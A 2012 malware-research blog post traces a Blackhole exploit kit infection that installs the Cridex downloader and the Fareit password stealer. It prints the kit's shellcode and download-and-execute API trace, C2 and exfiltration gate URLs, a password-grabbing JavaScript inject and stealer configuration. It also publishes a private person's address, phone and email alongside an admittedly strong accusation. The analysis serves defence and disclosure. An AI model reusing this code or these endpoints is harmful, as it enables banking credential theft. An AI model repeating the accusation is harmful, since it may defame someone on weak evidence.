Sunday, December 16, 2012

Getting more "Personal" & Deeper into Cridex joint with Fareit Credential Stealer Infection

I was posting this findings scattered in twitters, VirusTotal, KernelMode (thank's -
to @Xylit0l for the invitation), so is time to make it together..
And I'm advising you to make documentation is 1,000 times more important,
it sucks, time consuming, yet a perfect strategy to fight these moronz.

Started from a spam lead to redirector page, lead usto Blackhole(v2.01) landing page, below is the sites:

//Redirector: 
h00p://abyssinianflights.com/components/com_ag_google_analytics2/alert-service-citi-sign_in.html
BHEK Landing Page: 
h00p://eaglepointecondo.biz/detects/operation_alert_login.php
Here's the pastes of above data: Redirector-->>[PASTEBIN], LandingPage-->>[PASTEBIN], PulginDetectBHEK2-->>[PASTEBIN] The landing page was having 302 protector for bad parameters:
HTTP request sent, awaiting response... 302 Found
Location: h00p://citibank.com [following]
--20:24:05--  h00p://citibank.com/
           => `index.html'
Resolving citibank.com... 192.193.103.222, 192.193.219.58
Connecting to citibank.com|192.193.103.222|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: h00ps://online.citibank.com/US/Welcome.c [following]
h00ps://online.citibank.com/US/Welcome.c: Unsupported scheme.
I went straight wacking the shellcode, by recoding it into:
var a = "8282!%5185!%64c4!%44e0!%0551!%e004!%9134!...(copy-paste those moronz -
code here friends)..%1414!%".split("").reverse().join("");
x = a["replace"](/\%!/g, "%" + "u")
document.write(x);
This will burp you the shellcode... result is as below in bins..
41 41 41 41 66 83 e4 fc  fc eb 10 58 31 c9 66 81  AAAAf......X1.f.
e9 fe fd 80 30 28 40 e2  fa eb 05 e8 eb ff ff ff  ....0(@.........
ad cc 5d 1c c1 77 1b e8  4c a3 68 18 a3 68 24 a3  ..]..w..L.h..h$.
58 34 7e a3 5e 20 1b f3  4e a3 76 14 2b 5c 1b 04  X4~.^...N.v.+\..
a9 c6 3d 38 d7 d7 90 a3  68 18 eb 6e 11 2e 5d d3  ..=8....h..n..].
    :                          :                       :
4d 4b 5c 5b 07 47 58 4d  5a 49 5c 41 47 46 77 49  MK\[.GXMZI\AGFwI
44 4d 5a 5c 77 44 47 4f  41 46 06 58 40 58 17 47  DMZ\wDGOAF.X@X.G
4e 15 1b 18 12 19 46 12  19 41 12 19 41 12 1b 1b  N.....F..A..A...
0e 51 4d 15 19 45 12 19  4f 12 19 4e 12 19 42 12  .QM..E..O..N..B.
19 45 12 19 43 12 1b 18  12 19 43 12 1b 1b 12 19  .E..C.....C.....
47 0e 4f 15 19 43 0e 40  50 15 44 0e 46 4c 15 58  G.O..C.@P.D.FL.X
28 28                                             ((
Use your shellcode cracker tools or emulator libs to dis-assembly API:
0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://eaglepointecondo.biz/detects/operation_alert_login.php?of=30:1n:1i:1i:33&ye=1m:1g:1f:1j:1m:1k:30:1k:33:1o&g=1k&hx=l&nd=p, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
We'll get the payload download url below:
h00p://eaglepointecondo.biz/detects/operation_alert_login.php?of=30:1n:1i:1i:33&ye=1m:1g:1f:1j:1m:1k:30:1k:33:1o&g=1k&hx=l&nd=p
I like to see what server side of BHEK replied during download:
//my header
GET /detects/operation_alert_login.php?of=30:1n:1i:1i:33&%20ye=1m:1g:1f:1j:1m:1k:30:1k:33:1o&g=1k&hx=l&nd=p HTTP/1.1
Referer: h00p://eaglepointecondo.biz/detects/operation_alert_login.php
User-Agent: MalwareMustDie painted logo in your EK doors
Accept: */*
Host: eaglepointecondo.biz
Connection: Keep-Alive
//replies:
HTTP/1.1 200 OK
Server: nginx/1.3.3
Date: Sat, 15 Dec 2012 11:01:05 GMT
Content-Type: application/x-msdownload
Content-Length: 135168
Connection: close
X-Powered-By: PHP/5.3.14
Pragma: public
Expires: Sat, 15 Dec 2012 11:01:04 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="info.exe"
Content-Transfer-Encoding: binary
Here's what the mess looks like: I was tired so I tried to check it in some online tools, got no satisfactory result thus VirusTotal looks having problem uploading... so I used my last energy to check it myself, as per below video: This time I'll leave the binary analysis to you, you can use - my previous post as guidance, PS: the binaries are all encrypted, de-encrypt - them will be a good idea! (I will add the binary analysis later on..) I go straight to the behavior test below, to capture & expose this infection: The cridex trojan, if is executed it will be like this: This program will self-copied/drops itself to:
%AppData% KB000777165.exe //which is actually the same file...
With the copy API below:
CopyFileW(lpExistingFileName: "C:\TEST\info.exe", 
lpNewFileName: "C:\Documents and Settings\User\Application Data\KB00085031.exe", 
bFailIfExists: 0x0)
Here's the proof: A self execution trace with below API(CMD) found:
lpCmdLine=C:\Documents and Settings\User\Application Data\KB00085031.exe, uCmdShow=0
It runs like this: Found interesting strings in that binary: At this point we captured the huge binary saved after HTTP/POST sent:
POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 74.207.237.170:8080
Content-Length: 347
Connection: Keep-Alive
Cache-Control: no-cache
......dU..ZP....Y.yy..|4$R.".....u...+T..1L.;I.n6v39.+..
DP.....O@xt,U..V|............c1..4~:
R.E.........K.:+.....Z`.. y.....e.z...B.....^...bG..B.opBx0E\
.....B..N.]....g.^......59.L.l.M.....>q)..Q...\5..p...M..q...
W-.*...u.P.\p......2.K..HM7..~Z?vX.p.W..0.m....A?.u....=|<.\.'
.......5._7'..46..G\.o" ....}...E..K...2eE..,.U.=.C....KtU....
u..2.~@

// With the encryption reply long binary data...
Server: nginx/1.0.10
Date: Sat, 15 Dec 2012 09:58:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
f3b
.}.%..k..o.-..U...........C..8.C.0...o...E.d... snip
2U...`......p_| ]X.$...B..A.F....}.snip
.@C...4*j..|.\..%..xv-.....snip
.1..x.....2.....`3....3.1..7......M.k..r-5s.8P=snip
z.nT^MV..{+=3ym........Gj.3JV....x..xe{@.......snip
[.UK.un2.>.W`..{.9'+.7*f..v.................F.M.snip
v....[...M.O.......P2.....;..a\..^..Rv&..9P...xsnip
   :
   :snip
   :
.%......8{..6...J..$:?..E.+..C"...V'uZ1M..$Cy6}.1snip
3.!.i~..N.a..;^..+..a..[..J.~...7}....W...q.rR..n(."snip
.<p....N....,..v......R...d..U_...?....k...-.....E%.snip
...a.AZ$......H...7r......
And then found the below file was created in the %Temp%
FileName: exp2.tmp.exe
TimeStamp: 2012/12/15 18:58 122,880  
MD5 ce7474646297ed818bb8ed48f50c7e1e
The file looks like this: And THEN...the new process of exp2.tmp.exe started: Up to this point we know that KB00085031.exe downloads exp2.tmp.exe. Currently, in the registry was only one key was added. Is an autostart- for the KB00085031.exe :
HKU\S-1-5-21-1214440339-926492609-1644491937-1003
\Software\Microsoft\Windows\CurrentVersion\Run\KB00777165.exe: 
""C:\Documents and Settings\%%UserName\Application Data\KB00777165.exe""

Network activity

At this points, exp2.tmp.exe was making a hell of connection, I recorded in wireshark as per summary below, full data is here --->>[PASTEBIN]
(323): try to connect to 132.248.49.112
(335): DNS requests to...
          112.49.248.132.in-addr.arpa web.ecologia.unam.mx
          77.65.130.113.in-addr.arpa  ns.shinbiro.com..domain
(360): Communicating via HTTP/POST to 203.113.98.131:80
(385): ***** At this point the malware process exp2.tmp.exe was started....
(394): try to establish conn to 74.207.237.170
(399): send ping to 209.190.61.50
(405): Communicating via HTTP/POST to 174.143.174.136:8080
(461): try to establish conn to 199.71.215.194 
(467): Communicating via HTTP/POST to 210.56.23.100:8080
(495): try to establish conn to 132.248.49.112
(500): try to establish conn to 74.117.61.66
(535): try to establish conn to 173.192.229.36
(541): Communicating via HTTP/POST to 69.64.89.82:8080
(571): try to establish conn to: 173.224.221.135
(577): try to estacblish conn to: 59.90.221.6
(583): try to establish to 180.235.150.72
(588): Communicating via HTTP/POST to 123.49.61.59:8080
(641): Communicating via HTTP/POST to 123.49.61.59:8080
(716): try to establish conn to 113.130.65.77
(721): try to establish conn to  180.235.150.72
(726): Communicating via HTTP/POST to 69.64.89.82:8080
Mr. EP_X0FF the Global Moderator of KernelInfo was cracking the code to find the all connection possibilitty as below:
hxxp://123.49.61.59:8080
hxxp://180.235.150.72:8080
hxxp://59.90.221.6:8080
hxxp://173.224.221.135:8080
hxxp://210.56.23.100:8080
hxxp://199.71.215.194:8080
hxxp://74.117.61.66:8080
hxxp://209.51.221.247:8080
hxxp://174.143.174.136:8080
hxxp://74.207.237.170:8080
hxxp://203.217.147.52:8080
hxxp://208.87.243.18:8080
hxxp://206.176.226.157:8080
With the below list of callbacks:
hxxp://132.248.49.112:8080/asp/intro.php         
hxxp://113.130.65.77:8080/asp/intro.php         
hxxp://203.113.98.131:8080/asp/intro.php         
hxxp://110.164.58.250:8080/asp/intro.php         
hxxp://200.108.18.158:8080/asp/intro.php         
hxxp://207.182.144.115:8080/asp/intro.php         
hxxp://148.208.216.70:8080/asp/intro.php         
hxxp://203.172.252.26:8080/asp/intro.php         
hxxp://202.6.120.103:8080/asp/intro.php         
hxxp://203.146.208.180:8080/asp/intro.php         
hxxp://207.126.57.208:8080/asp/intro.php         
hxxp://203.80.16.81:8080/asp/intro.php         
hxxp://202.180.221.186:8080/asp/intro.php

File activity

The exp2.tmp.exe at the first runs making your PC so slow, because it search every path possible for the data to steal, VirusTotal is making good behavior file access list here-->>[PASTEBIN] Snipped here:
\\.\PIPE\lsarpc (successful)
C:\DOCUME~1\~1\LOCALS~1\Temp\HWID (failed)
C:\WINDOWS\wcx_ftp.ini (failed)
C:\Documents and Settings\\wcx_ftp.ini (failed)
C:\Documents and Settings\\Application Data\GHISLER\wcx_ftp.ini (failed)
C:\Documents and Settings\All Users\Application Data\GHISLER\wcx_ftp.ini (failed)
C:\Documents and Settings\\Local Settings\Application Data\GHISLER\wcx_ftp.ini (failed)
C:\Documents and Settings\\Application Data\GlobalSCAPE\CuteFTP\sm.dat (failed)
C:\Documents and Settings\\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat (failed)
C:\Documents and Settings\\Application Data\GlobalSCAPE\CuteFTP Lite\sm.dat (failed)

The Password Stealer Configurator

At this point in your registry at the below key:
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows NT\SD5809E24(←random)\:
Was saved a long strings like this:
3C 73 65 74 74 69 6E 67 73 20 68 61 73 68 3D 22 39 34 38 62 33 33 30 31 35 38 63 61 66 64 39 37 36 31 39 64 39 38 35 31 39 66 39 66 64 38 61 66 61 64 39 34 62 37 64 38 22 3E 3C 68 74 74 70 73 68 6F 74 73 3E 3C 75 72 6C 20 74 79 70 65 3D 22 64 65 6E 79 22 3E 5C 2E 28 63 73 73 7C 6A 73 29 28 24 7C 5C 3F 29 3C 2F 75 72 6C 3E 3C 75 72 6C 20 63 6F 6E 74 65 6E 74 54 79 70 65 3D 22 5E 74 65 78 74 2F 28 68 74 6D 6C 7C 70 6C 61 69 6E 29 22 3E 5C 2E 63 6F 6D 2F 6B 31 2F 3C 2F 75 72 6C 3E 3C 75 72 6C 20 63 6F 6E 74 65 6E 74 54 79 70 65 3D 22 5E 74 65 78 74 2F 28 68 74 6D 6C 7C 70 6C 61 69 6E 29 22 3E 2F 61 63 68 2F 3C 2F 75 72 6C 3E 3C 75 72 6C 20 63 6F 6E 74 65 6E 74 54 79 70 65 3D 22 5E 74 65 78 74 2F 28 68 74 6D 6C 7C 70 6C 61 69 6E 29 22 3E 2F 61 75 74 68 65 6E 74 69 63 61 74 69 6F 6E 2F 7A 62 66   
   :
6F 64 79 2E 2A 3F 3E 28 2E 2A 3F 29 5D 5D 3E 3C 2F 70 61 74 74 65 72 6E 3E 3C 72 65 70 6C 61 63 65 6D 65 6E 74 3E 3C 21 5B 43 44 41 54 41 5B 3C 73 63 72 69 70 74 20 74 79 70 65 3D 22 74 65 78 74 2F 6A 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3D 22 68 74 74 70 3A 2F 2F 37 38 2E 31 35 39 2E 31 32 31 2E 31 32 38 3A 38 30 38 30 2F 69 70 63 6B 67 2F 67 61 74 65 2E 70 68 70 3F 62 6F 74 69 64 3D 52 49 4B 2D 31 33 37 39 43 46 33 37 43 32 35 5F 39 34 35 35 45 35 30 44 30 42 32 44 32 30 43 42 26 62 61 6E 6B 3D 62 61 6E 6B 6F 66 61 6D 65 72 69 63 61 22 3E 3C 2F 73 63 72 69 70 74 3E 5D 5D 3E 3C 2F 72 65 70 6C 61 63 65 6D 65 6E 74 3E 3C 2F 6D 6F 64 69 66 79 3E 3C 2F 61 63 74 69 6F 6E 73 3E 3C 2F 68 74 74 70 69 6E 6A 65 63 74 3E 3C 2F 68 74 74 70 69 6E 6A 65 63 74 73 3E 3C 2F 73 65 74 74 69 6E 67 73 3E
Save that↑as binary with the TXT filename & you'll see this malware config in text, you'll see the bank/case online sites with each connection with the credential path also some public https or ftp online. I saved the data in here-->>[PASTEBIN] Thank's again to Mr. EP_X0FF the Global Moderator of KernelInfo who mentioned all of the software & path of credentials seeked here-->>[PASTEBIN] I counted 491 type of credentials was seeked.. Back to the this stealer configuration file, it has encryption before sent by POST method:
if(typeof window.EncryptPassword=='function')
{var fn=window.EncryptPassword;window.EncryptPassword=function(id)
  {
  try{var e=document.getElementById(id);
  var i=document.createElement("input");
  i.type="hidden";
  i.name="OPN";
  i.value=e.value;
document.Form1.appendChild(i);}
catch(e){}return fn(id);};}
There is also phishing for the credit card/online banking trap, the code is in stealer configuration, something like this snips:
      :
<span class="bodytext">
 Click "Next" to complete Identity verification process. 
</span>
<!-- END of art_SA_edu_edu_instr in DCTM ECP -->
          </td>
        </tr>
        <tr>
          <td colspan="2">
             </td>
        </tr>
        <tr>
          <td>
             </td>
          <td>
            <span class="bodytext">
              <label title="Go to Enter Card">
                
              </label>
            </span>
          </td>
        </tr>
        <tr>
          <td colspan="2">
             </td>
              :
I just save the configuration data into html & run it as PoC, saved it as this teststealer.html: See the path & filename well..Then here we go... Hello American Express! Good Day Chase Bank! In what I confimred in configuration code, it sends stolen credential into:
h00p://78.159.121.128:8080/ipckg/gate.php?botid=-YOUR-PC-ID-&bank=chase
h00p://78.159.121.128:8080/ipckg/gate.php?botid=-YOUR-PC-ID-&bank=wellsfargo
h00p://78.159.121.128:8080/ipckg/gate.php?botid=-YOUR-PC-ID-&bank=bankofamerica

Virus Total Detection Ratio

It's been 24hrs more since I detected these messes, after 1st disclosure in- here and there let's see the detection ratio of these infectors below: The landing page:
SHA1: 35d9f1481132d8f1abdc1b2d3aa56cd1455f6656 MD5: a93bb29d6a3c3c04b1cb3dafc7cfc79f File size: 90.1 KB ( 92310 bytes ) File name: operation_alert_login.php File type: HTML Detection ratio:6 / 46 Analysis date: 2012-12-16 06:22:39 UTC ( 1 分 ago ) URL -->>[CLICK] MalwareName: McAfee-GW-Edition : JS/Exploit-Blacole.gq NANO-Antivirus : Trojan.Script.Expack.bcrxpa McAfee : JS/Exploit-Blacole.gq Fortinet : JS/Obfuscus.AACB!tr TheHacker : JS/Feebs.gen@MM AVG : JS/Redir
The Cridex trojan of password stealer downloader:
SHA1: d4bfbbd375da0ac775812bed2459ff908e1fb9ba MD5: b360fec7652688dc9215fd366530d40c File size: 132.0 KB ( 135168 bytes ) File name: info.exe File type: Win32 EXE Tags: peexe Detection ratio: 26 / 45 Analysis date: 2012-12-16 01:28:28 UTC ( 5 時間, 5 分 ago ) URL -->>[CLICK] MalwareName: MicroWorld-eScan : Trojan.Generic.KD.810285 McAfee : pws-ja!cm Malwarebytes : Trojan.FakeMS Symantec : W32.Cridex Norman : W32/Suspicious_Gen4.BTZMQ ESET-NOD32 : a variant of Win32/Kryptik.AQNJ TrendMicro-HouseCall : TROJ_GEN.RCBCDLE Avast : Win32:Dropper-MEA [Drp] Kaspersky : Trojan.Win32.Bublik.wad BitDefender : Trojan.Generic.KD.810285 Emsisoft : Trojan.Win32.Agent.AMN (A) Comodo : TrojWare.Win32.Trojan.Agent.Gen F-Secure : Trojan.Generic.KD.810285 DrWeb : Trojan.Necurs.97 VIPRE : Win32.Malware!Drop AntiVir : TR/Bublik.wad McAfee-GW-Edition : pws-ja!cm Sophos : Troj/Agent-ZIT Microsoft : Worm:Win32/Cridex.E ViRobot : Trojan.Win32.A.Bublik.135168.S GData : Trojan.Generic.KD.810285 PCTools : Malware.Cridex Ikarus : Trojan-Spy.Agent Fortinet : W32/Bublik.WAD!tr AVG : Generic30.BIMO Panda : Trj/Sinowal.WWG
The password stealer (fareit) trojan:
SHA1: 88bab6d7c0e98b1ee55110243251f562af399854 MD5: ce7474646297ed818bb8ed48f50c7e1e File size: 120.0 KB ( 122880 bytes ) File name: exp2.tmp.ex_ File type: Win32 EXE Tags: peexe Detection ratio: 7 / 46 Analysis date: 2012-12-16 01:13:52 UTC ( 5 時間, 6 分 ago ) URL -->>[CLICK] MalwareName: DrWeb : Trojan.PWS.Stealer.1656 VIPRE : Trojan.Win32.Kryptik.alry (v) Emsisoft : Trojan.PSW.Win32.Tepfer.dazd.AMN (A) Kaspersky : Trojan-PSW.Win32.Tepfer.dazd Malwarebytes : Trojan.PWS Kingsoft : Win32.Malware.Generic.a.(kcloud) ViRobot : Trojan.Win32.A.PSW-Tepfer.122880.A
We can see that the landing page & password stealer (Fareit) STILL has low detection.

Samples

For the good guys, the samples & captures data avilable. Samples --->>[HERE] Research Data(PCAP, RegShot) -->>[HERE] Cracked Data (deobfs'ed code, decrypt binaries(thanks to kernelmode!)etc) -->>[HERE]

Thank's to...

To all MalwareMustDie friends! Without you guys, I won't do this far :-) Blake (jsunpack, for inspiring the stealer configuration file. @Xylit0l & EP_X0FF of kernelmode, great thank's! YouTube, VirusTotal, MediaFire, Google & Blogger

Network Analysis..Tracing the Bad guys..

As per requested, I investigated the NS used, leads to someone.. Please bear my text since I posted via FreeBSD below:
//The domain used for the infector is 
eaglepointecondo.biz  900 IN  A  59.57.247.185
// ↑This is aiming US for sure (see the bank list, 75% are US banks)

// The SOA that was used (mark the TTL refresh time..)
primary name server = ns1.amishshoppe.net
responsible mail addr = (root)
serial  = 1355645102
refresh = 60 (1 min)
retry   = 120 (2 mins)
expire  = 1048576 (12 days 3 hours 16 mins 16 secs)
default TTL = 900 (15 mins) //←this!

//How it was root'ed: 
Tracing to eaglepointecondo.biz[a] via 202.238.95.24, maximum of 1 retries
202.238.95.24 (202.238.95.24) 
 |\___ a.gtld.biz [biz] (156.154.124.65) 
 |     |\___ NS1.AMISHSHOPPE.NET [eaglepointecondo.biz] (209.140.18.37) Got authoritative answer 
 |      \___ NS2.AMISHSHOPPE.NET [eaglepointecondo.biz] (211.27.42.138) * 
 |\___ k.gtld.biz [biz] (156.154.128.65) 
 |     |\___ NS2.AMISHSHOPPE.NET [eaglepointecondo.biz] (211.27.42.138) * 
 |      \___ NS1.AMISHSHOPPE.NET [eaglepointecondo.biz] (209.140.18.37) Got authoritative answer 
 |\___ f.gtld.biz [biz] (209.173.58.66) 
 |     |\___ NS2.AMISHSHOPPE.NET [eaglepointecondo.biz] (211.27.42.138) * 
 |      \___ NS1.AMISHSHOPPE.NET [eaglepointecondo.biz] (209.140.18.37) Got authoritative answer 
 |\___ c.gtld.biz [biz] (156.154.127.65) 
 |     |\___ NS1.AMISHSHOPPE.NET [eaglepointecondo.biz] (209.140.18.37) Got authoritative answer 
 |      \___ NS2.AMISHSHOPPE.NET [eaglepointecondo.biz] (211.27.42.138) * 
 |\___ b.gtld.biz [biz] (156.154.125.65) 
 |     |\___ NS1.AMISHSHOPPE.NET [eaglepointecondo.biz] (209.140.18.37) Got authoritative answer 
 |      \___ NS2.AMISHSHOPPE.NET [eaglepointecondo.biz] (211.27.42.138) * 
  \___ e.gtld.biz [biz] (156.154.126.65) 
       |\___ NS1.AMISHSHOPPE.NET [eaglepointecondo.biz] (209.140.18.37) Got authoritative answer 
        \___ NS2.AMISHSHOPPE.NET [eaglepointecondo.biz] (211.27.42.138) * 

//History of infector from 59.57.247.185 leaeds to:
eaglepointecondo.org  A  59.57.247.185
pleansantwille.com  A  59.57.247.185
eaglepointecondo.co  A  59.57.247.185
platinumbristol.net  A  59.57.247.185
eaglepointecondo.biz  A  59.57.247.185
sessionid0147239047829578349578239077.pl  A  59.57.247.185

//It uses Chinese IP:
ASN  |Prefix        |  ASName  |CN  |Domain    |ISP of an IP Address
4134 | 59.56.0.0/14 | CHINANET | CN | XMJL.COM | XIAMEN JINLONGLVXINGCHE FUJIAN PROVINCE

//PoC of this IP infection as additional evidence:
http://urlquery.net/search.php?q=59.57.247.185&type=string&start=2012-12-01&end=2012-12-16&max=300

// These moronz is using the DNS below:
ns1.amishshoppe.net.    3600    IN      A       209.140.18.37
ns2.amishshoppe.net.    3600    IN      A       211.27.42.138

// Those DNS Server are in US & Australia (should report this malicious use..)
ASN   |Prefix           |  ASName             | CN | Domain        | ISP of an IP Address
11042 | 209.140.16.0/22 | LANDIS-HOLDINGS-INC | US | NOCDIRECT.COM | LANDIS HOLDINGS INC
9443  | 211.27.32.0/20  | INTERNETPRIMUS-AS   | AU | PRIMUSTEL.COM | PRIMUS TELECOMMUNICATIONS

//Looks they should got full control on domain amishshoppe.net to control DNS:
PoC:
; <<>> DiG 9.8.1-P1 <<>> 209.140.18.37 axfr // Voila! no AXFR allowed means NS ust be added directly.
;; global options: +cmd
; Transfer failed.
; <<>> DiG 9.8.1-P1 <<>> 211.27.42.138 axfr
;; global options: +cmd
; Transfer failed.

//This infector in WHOIS:
Domain Name:                                 EAGLEPOINTECONDO.BIZ
Domain ID:                                   D52418387-BIZ
Sponsoring Registrar:                        GODADDY.COM, INC.
Name Server:                                 NS1.AMISHSHOPPE.NET
Name Server:                                 NS2.AMISHSHOPPE.NET
Created by Registrar:                        GODADDY.COM, INC.
Last Updated by Registrar:                   GODADDY.COM, INC.
Domain Registration Date:                    Sat Dec 08 00:22:13 GMT 2012
Domain Expiration Date:                      Sat Dec 07 23:59:59 GMT 2013
Domain Last Updated Date:                    Mon Dec 10 19:12:41 GMT 2012

//VIA Strange proxy services....
Registrant Organization:                     Domains By Proxy, LLC
Registrant Address1:                         DomainsByProxy.com
Registrant Address2:                         14747 N Northsight Blvd Suite 111, PMB 309
Registrant City:                             Scottsdale
Registrant State/Province:                   Arizona
Registrant Postal Code:                      85260
Registrant Country:                          United States
Registrant Country Code:                     US
Registrant Phone Number:                     +1.4806242599
Registrant Facsimile Number:                 +1.4806242598

// some must start questioning Mr. Steve Burandt in US about this infection...
Domain Name: AMISHSHOPPE.NET
   Registrar: REGISTER.COM, INC.
   Whois Server: whois.register.com
   Referral URL: http://www.register.com
   Name Server: NS1.AMISHSHOPPE.NET
   Name Server: NS2.AMISHSHOPPE.NET
   Status: clientTransferProhibited
   Updated Date: 15-nov-2012  // <== JUST UPDATED!! #PoC Proved!! #w00t!
   Creation Date: 15-nov-2012
   Expiration Date: 15-nov-2013
   
   Registrant:
      Steve Burandt
      0n430 Peter Rd
      Winfield, IL 60190
      US
      Phone: +1.6304626711
      Email: solaradvent@yahoo.com
↑Strong accusation, I know, but the data said so.. Can't wait to hear the explanation from this person..

#MalwareMustDie!

2 comments: